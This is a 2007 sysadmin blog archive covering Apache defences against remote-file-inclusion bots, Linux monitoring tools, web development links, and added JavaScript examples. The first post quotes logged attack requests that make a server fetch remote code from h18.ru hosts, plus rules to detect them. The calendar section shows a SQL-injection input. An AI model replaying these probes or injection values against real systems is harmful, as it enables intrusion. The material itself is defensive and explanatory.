Archive for October, 2007
How to frustrate a trojan bot script
Posted by Eric Bazerghi in Geek Stuff, Information Security, News on October 27, 2007
While doing some regular maintenance on some websites I manage, I came across some interesting entries in the logs for one of our servers: hundreds and hundreds of requests like the following, originating from a wide variety of IPs:
GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?
Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. In the cases above, the file is named 'cs.txt'. You can see the contents of the script by reading Dan Langille's sanitized version of the attack script.
While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious CPU time for these attackers? Why not have them waste their own CPU time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a web page from a server, being told that the page has moved and being given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called the loopback address, a networking standard that always refers to the machine making the request.
Here's what I put in httpd.conf, the Apache web server's configuration file, on the Linux server I wanted to modify:
RewriteEngine on
# Match the literal text cs.txt? anywhere in the query string, case-insensitively.
# The '.' and '?' are escaped: unescaped, the pattern would match 'cs', any character, 'tx' and an optional 't'.
RewriteCond %{QUERY_STRING} cs\.txt\? [NC]
# Answer any such request with a permanent redirect to the requester's own loopback address.
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]
So now, whenever a request comes in whose query string contains the string 'cs.txt?', I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address, which in essence is the requester itself.
While the hits on the server continue, I have noticed they have slowed down, presumably because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time on these trojan hits, and is letting them talk to themselves for a bit instead.
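As an added example (not the post's own code or configuration), here is a small JavaScript check that applies the same idea to constructed access-log lines: it flags any request whose query-string value is itself a URL, which is what these remote-file-inclusion probes look like whatever the remote file is called, and reports how many of them the post's narrow cs.txt rule would actually catch. The log lines, the client IPs and the third remote host are constructed; the first two remote hosts are the ones quoted in the post.

```javascript
// Constructed Apache access-log lines (combined format). Client IPs are
// documentation-range addresses; the first two remote hosts are the ones
// quoted in the post, the third is made up. Added example, not the post's code.
const SAMPLE_LOG = [
  '203.0.113.7 - - [27/Oct/2007:10:01:02 -0400] "GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"',
  '198.51.100.9 - - [27/Oct/2007:10:01:05 -0400] "GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"',
  '192.0.2.44 - - [27/Oct/2007:10:02:11 -0400] "GET /modules.php?op=modload&name=News HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [27/Oct/2007:10:03:30 -0400] "GET /modules.php?op=http://198.51.100.20/images/other.txt? HTTP/1.1" 404 1234 "-" "libwww-perl/5.805"',
].join('\n');

// client IP, method and request target from a combined-format line
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)/;

// The post's RewriteCond pattern with '.' and '?' escaped, so it matches the
// literal text cs.txt? instead of 'cs', any character, 'tx', optional 't'.
const CS_TXT_RULE = /cs\.txt\?/i;

// A query-string value that is itself a URL is the signature of the remote
// file inclusion probes the post describes, regardless of the file name.
function isRfiProbe(query) {
  for (const value of new URLSearchParams(query).values()) {
    if (/^(https?|ftp):\/\//i.test(value)) return true;
  }
  return false;
}

// Returns { ip, probe, caughtByRule } for one log line, or null if unparseable.
function classify(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const target = m[3];
  const query = target.includes('?') ? target.slice(target.indexOf('?') + 1) : '';
  return { ip: m[1], probe: isRfiProbe(query), caughtByRule: CS_TXT_RULE.test(query) };
}

// Probes per source IP, and how many the narrow cs.txt rule would (not) catch.
function summarize(logText) {
  const out = { probesByIp: {}, caughtByRule: 0, missedByRule: 0 };
  for (const line of logText.split('\n')) {
    const r = classify(line);
    if (!r || !r.probe) continue;
    out.probesByIp[r.ip] = (out.probesByIp[r.ip] || 0) + 1;
    if (r.caughtByRule) out.caughtByRule += 1; else out.missedByRule += 1;
  }
  return out;
}

console.log(summarize(SAMPLE_LOG));
```

The last sample line shows the limit of matching one file name: a probe pointing at a differently named file is still a probe, but the cs.txt rule lets it through to the normal 404 handling.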
More ‘tops’ to Keep you on Top
Posted by Eric Bazerghi in Blogs, Bookmarks, Geek Stuff, Linux, Reviews on October 11, 2007
Yesterday, I posted about how htop was my new replacement for top on all Linux systems I manage. Tonight, while looking through the Google search words that led people to my site, I found a Google result page which contained a 'hit' that immediately caught my eye. Mike Malone, of the I'm Mike blog, had an entry titled 'Top 5 tops: keep tabs on your system'. In it, he describes not only the htop utility I came across earlier, but 4 additional tops to make any Linux administrator smile.
- mtop (MySQL top) monitors a MySQL server showing the queries which are taking the most amount of time to complete. Features include 'zooming' in on a process to show the complete query, 'explaining' the query optimizer information for a query and 'killing' queries. In addition, server performance statistics, configuration information, and tuning tips are provided.
- Apachetop is a curses-based top-like display for Apache information, including requests per second, bytes per second, most popular URLs, etc.
- iftop does for network usage what top does for CPU usage. It listens to network traffic on a named interface and displays a table of current bandwidth usage by pairs of hosts. Handy for answering the question "why is our ADSL link so slow?".
- htop, an interactive process viewer for Linux
- atop is a performance monitor that can display:
  - Resource consumption by all processes
  - Utilization of all relevant resources
  - Permanent logging of resource utilization
  - Highlight critical resources
  - Watch activity only
  - Watch deviations only
  - Accumulated process activity per user
  - Accumulated process activity per program
  - Disk and network activity per process
While I use mtop on a regular basis, and have now started using htop, the other 3 monitors definitely look like they're going to be part of my 'tools' for the various servers I manage. iftop and apachetop seem especially interesting to me, given their more specialized monitoring targets.
htop – Unix top on steroids
Posted by Eric Bazerghi in Bookmarks, Geek Stuff, Linux on October 10, 2007
A coworker of mine showed me a small utility he read about on LifeHacker (Manage Processes with htop) this morning. I checked out the htop project site, quickly downloaded the source RPM, built the package and installed it on one of my Fedora boxes at home.
Here’s how htop compares to top, taken straight from the htop project site:
Comparison between htop and top
- In ‘htop’ you can scroll the list vertically and horizontally to see all processes and complete command lines.
- In ‘top’ you are subject to a delay for each unassigned key you press (especially annoying when multi-key escape sequences are triggered by accident).
- ‘htop’ starts faster (‘top’ seems to collect data for a while before displaying anything).
- In ‘htop’ you don’t need to type the process number to kill a process, in ‘top’ you do.
- In ‘htop’ you don’t need to type the process number or the priority value to renice a process, in ‘top’ you do.
- ‘htop’ supports mouse operation, ‘top’ doesn’t.
- ‘top’ is older, hence, more used and tested.
All I can say is I’ll probably not use ‘top’ anymore. It’s htop for me going forward…
htop – an interactive process viewer for Linux – http://htop.sourceforge.net/
Sun’s Attempt at a Web-Based OS?
Posted by Eric Bazerghi in Ajax/Web 2.0, Geek Stuff, Reviews on October 9, 2007
Every now and then, Sun's Research group comes out with something that seems very interesting and leaves me wondering if this is the direction we might be heading in. It's difficult to describe Sun Labs Lively Kernel, so I'll simply quote from their website:
The Sun Labs Lively Kernel is a novel web programming environment developed by Project Flair at Sun Labs. The main goal of the Lively Kernel is to bring the same kind of simplicity, generality and flexibility to web programming that we have known in desktop programming for thirty years, but without the installation and upgrade hassles that conventional desktop applications have.
Remember all those rumors about how Google was developing an OS which would run in a browser? Well, this is the closest thing that I've seen to such a beast. When you visit the Sun Labs Lively Kernel page, click on the 'Enter Lively Kernel' tab to see the prototype in action. While performance was slow for me, it gives you a good idea of where we could be heading in the future.
Sun Labs Lively Kernel – http://research.sun.com/projects/lively/index.html
E-Mail Address Portability?
Posted by Eric Bazerghi in Geek Stuff, News on October 5, 2007
This week, someone decided to petition the FCC for something amazingly stupid: they want the FCC to force ISPs to provide 'e-mail address portability'. Just like with telephone numbers, this individual thinks it's a good idea.
This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actually entities, bought and owned by someone or a company. The key word is owned. You don't 'own' the email address; in essence, you're 'renting' it! If you stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.
Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email to address #1 with a 10Mb attachment. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, until it gets to address #5. My email has been handled by 5 different ISPs, and they all had to absorb the cost of moving my bytes over to another ISP, and so on. Absolutely ridiculous if you ask me.
I'm all for asking ISPs to do something like this for a very short period of time, just like the Postal Service. But I would do it somewhat differently. Instead of burdening the ISPs with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved' and here is his/her new email address. We're now talking about an email with a size of 1000 to 2000 bytes, instead of in the megabytes. We avoid forwarding spam, and if the sender email doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISPs that already do this as a courtesy to their customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.
So instead of petitioning for e-mail address portability, we should be asking ISPs to implement some sort of email 'address' forwarding/bounce functionality instead. It's cleaner, more efficient and much less of a burden on ISPs and the infrastructure as a whole.
Client Side Load Balancing for Web 2.0
Posted by Eric Bazerghi in Ajax/Web 2.0, Geek Stuff on October 5, 2007
So you’re writing a large web application, with multiple web servers on the front-end waiting to serve your users. The first thing you do is start to think about a load balancing solution, be it a hardware solution such as a Coyote Point Systems box, or even a ‘software’ solution, such as round robin DNS. Now, with the advent of ‘Web 2.0’, we’re slowly seeing another ‘solution’ starting to gain some traction: client side load balancing.
To put it simply, we let each ‘client’ decide which server to connect to. Each client has a list of all available servers, and randomly selects one and attempts to exchange data. If the client receives a message indicating the server is busy, or no response at all within a set period of time, it moves to another server on the list until it can complete its transaction. Lei Zhu, a contributor at Digital Web, has this to say about the advantages of such a solution:
- Distribute loads among a cluster of application servers. Since the client randomly selects the server it connects to, the loads should be distributed evenly among the servers.
- Handle failover of an application server gracefully. The client has the ability to failover to another server when the chosen server does not respond within a preset period of time. The application server connection seamlessly fails over to another server.
- Ensure the cluster of servers appears to the end user as a single server. In the example, the user simply points a browser to http://www.myloadbalancedwebsite.com/. The actual server used is transparent to the user.
A big advantage to such a solution is that you don’t need to spend money on a hardware device, at least in the short-term. You can have some code on your back-end that monitors the web servers and removes any unavailable servers from the server list sent to each client.
Another advantage that Lei points out is that the web servers can be distributed anywhere geographically. Sure, this can be done with a load balancer, but it’s a far trickier and more complicated setup than just having to change a server entry in a file sent to each client.
Lei’s article also includes a short write-up of an application, Voxlite, using such a design.
Overall, while I still have some doubts regarding the scalability of such a solution, it’s an interesting use of Web 2.0.
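An added illustration (not code from Lei Zhu's article or from Voxlite) of the client-side scheme described above: the browser is handed a server list, starts at a random entry so that clients spread themselves across the cluster, and moves on to the next server when one reports busy (503), errors out, or fails to answer within a timeout. The hostnames and the stand-in fetch are constructed.

```javascript
// Start from a random index and wrap around: load spreads evenly across
// clients, yet every client still tries each server at most once.
function orderServers(servers, rng = Math.random) {
  const start = Math.floor(rng() * servers.length);
  return servers.slice(start).concat(servers.slice(0, start));
}

// Reject when the request has not settled within timeoutMs.
function withTimeout(promise, timeoutMs) {
  let timer;
  const deadline = new Promise((_, reject) => {
    timer = setTimeout(() => reject(new Error('timeout')), timeoutMs);
  });
  return Promise.race([promise, deadline]).finally(() => clearTimeout(timer));
}

// Try servers in order; move on when one is busy (503), errors or times out.
// Resolves with the first success plus a record of the attempts that failed.
async function requestWithFailover(servers, path, opts = {}) {
  const { fetchImpl = globalThis.fetch, timeoutMs = 3000, rng = Math.random } = opts;
  const attempts = [];
  for (const server of orderServers(servers, rng)) {
    try {
      const response = await withTimeout(fetchImpl(server + path), timeoutMs);
      if (response.status === 503) {
        attempts.push({ server, outcome: 'busy' });
        continue;
      }
      return { server, response, attempts };
    } catch (err) {
      attempts.push({ server, outcome: err.message });
    }
  }
  throw new Error('all servers failed: ' + JSON.stringify(attempts));
}

// Constructed stand-in for fetch(): app1 never answers, app2 is busy, app3 works.
function fakeFetch(url) {
  if (url.startsWith('https://app1.example')) return new Promise(() => {});
  if (url.startsWith('https://app2.example')) return Promise.resolve({ status: 503 });
  return Promise.resolve({ status: 200, body: 'ok from ' + url });
}

// The server list a back-end health monitor would hand to each client.
const SERVERS = ['https://app1.example', 'https://app2.example', 'https://app3.example'];

requestWithFailover(SERVERS, '/api/data', { fetchImpl: fakeFetch, timeoutMs: 50, rng: () => 0 })
  .then((r) => console.log('served by', r.server, 'after', r.attempts));
```

In a real client the list would come from the back-end monitor the post mentions, and the timeout should be short enough that a hung server costs the user well under a second before the next one is tried.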
Digital Web Magazine – Client Side Load Balancing for Web 2.0 Applications
Firebug – The Web Development tool/add-on
Posted by Eric Bazerghi in Ajax/Web 2.0, CSS on October 4, 2007
I use Firefox as my main browser about 99% of the time, and one feature I love is the ability to extend its capabilities through the installation of ‘Add-ons’. One add-on that I’ve been using lately that has been a huge time saver for me is Firebug.
Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
It’s all there, all in your browser. Instant feedback on any changes you make during some CSS tweaking, etc.
Javascript Gallery and Slideshow System
Posted by Eric Bazerghi in Ajax/Web 2.0, Bookmarks, CSS on October 2, 2007
I'm always on the lookout for a slick way to display a series of images within a web page. Jonathan Schemoul over at JonDesign has released SmoothGallery 2.0, and it looks very slick. Here's a small quote from his site that sums it all up:
"So, what is so cool about it ?
Unlike other systems out there, JonDesign's SmoothGallery is designed from the ground up to be standard compliant: You can feed it from any document, using custom css selectors.
And even better, this solution is very lightweight: The javascript file is only 24kb."
For now, Jonathan's solution definitely is leaps and bounds ahead of other similar offerings, which either have fewer features, too many features, or are horribly coded.
JonDesign's Smoothgallery 2.0 – http://smoothgallery.jondesign.net/
Coding a simple Ajax Calendar with a MySQL backend
Posted by Eric Bazerghi in Ajax/Web 2.0, Bookmarks on October 2, 2007
When doing any kind of web development, I always come across a time when I need to implement some sort of calendar; be it a small ‘applet’ enabling the user to select a date more effectively, or something a bit ‘larger’, displaying something more relevant for certain days.
Jamie over at www.nodstrum.com wrote up some code that can be used as an effective base for many ‘calendaring’ needs most web developers come across. It’s PHP and MySQL, so it should meet the needs of most folks out of the box, but can also be easily ported to another development language.
One word of caution: Jamie makes it clear that his priority was functionality and not security. As such, if you use his code, make sure to apply best practices with regard to SQL injection, etc.
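An added illustration of that caveat, not Jamie's code (his is PHP): the kind of month lookup an Ajax calendar performs, written first the unsafe way and then the hardened way in JavaScript. The table and column names are hypothetical, and a database driver that binds '?' placeholders is assumed.

```javascript
// Added example, not from nodstrum.com. A calendar's Ajax handler receives a
// year and month from the browser and fetches that month's events.

// Unsafe: the request values are pasted into the SQL text, so anything the
// browser sends becomes part of the statement instead of being treated as data.
function eventsQueryUnsafe(year, month) {
  return 'SELECT id, day, title FROM events WHERE year = ' + year +
         ' AND month = ' + month + ' ORDER BY day';
}

// Hardened: check the shape of the input first (a calendar only ever needs two
// small integers), then keep SQL text and data separate by binding the values.
function eventsQuerySafe(year, month) {
  const y = Number(year);
  const m = Number(month);
  const inRange = Number.isInteger(y) && Number.isInteger(m) &&
                  y >= 1970 && y <= 2100 && m >= 1 && m <= 12;
  if (!inRange) throw new RangeError('year and month must be integers in range');
  return {
    sql: 'SELECT id, day, title FROM events WHERE year = ? AND month = ? ORDER BY day',
    params: [y, m], // the driver binds these; they never touch the SQL text
  };
}

// Constructed browser input: the month field has been tampered with.
const tamperedMonth = '10 OR 1=1';
console.log(eventsQueryUnsafe('2007', tamperedMonth)); // the OR now lives in the query
console.log(eventsQuerySafe('2007', '10'));            // { sql: '... = ? ...', params: [2007, 10] }
```

Validation alone is not the fix (a later field might legitimately be free text), which is why the hardened version binds parameters as well as checking them.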
If you’re interested in how Jamie’s code evolved, check out these articles also on his site:
Calendar System – Easily using PHP & Script.aculo.us
MySQL Calendar
If all you’re looking for is a simple, elegant date ‘selector’, give DatePicker a look.